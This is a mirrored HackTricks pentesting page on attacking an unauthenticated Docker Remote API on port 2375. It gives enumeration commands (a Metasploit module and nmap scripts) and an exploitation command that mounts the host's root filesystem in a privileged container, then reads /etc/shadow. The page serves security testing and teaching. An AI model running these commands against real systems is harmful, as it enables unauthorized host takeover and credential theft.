Mirrors/hacktricks
2
0
Fork 0
mirror of https://github.com/carlospolop/hacktricks synced 2025-01-09 11:48:51 +00:00
Code Issues Projects Releases Packages Wiki Activity
hacktricks/pentesting/2375-pentesting-docker.md
CPol faf77aef23
GitBook: [master] 2 pages modified
2020-12-15 09:18:43 +00:00

35 lines
985 B
Markdown
Raw Blame History

This file contains ambiguous Unicode characters

This file contains Unicode characters that might be confused with other characters. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

# 2375 Pentesting Docker
## 2375 - Pentesting Docker API
### Basic Information
Remote API is running by default on 2375 port when enabled. The service by default will not require authentication allowing an attacker to start a privileged docker container. By using the Remote API one can attach hosts / \(root directory\) to the container and read/write files of the hosts environment.
**Default port:** 2375
```text
PORT STATE SERVICE
2375/tcp open docker
```
### Enumeration
```bash
msf> use exploit/linux/http/docker_daemon_tcp
nmap -sV --script "docker-*" -p <PORT> <IP>
```
### Exploitation
Check if its vulnerable to execute arbitrary code:
```bash
docker -H <host>:2375 run --rm -it --privileged --net=host -v /:/mnt alpine
cat /mnt/etc/shadow
```
* [https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/CVE%20Exploits/Docker%20API%20RCE.py](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/CVE%20Exploits/Docker%20API%20RCE.py)
Reference in a new issue View git blame Copy permalink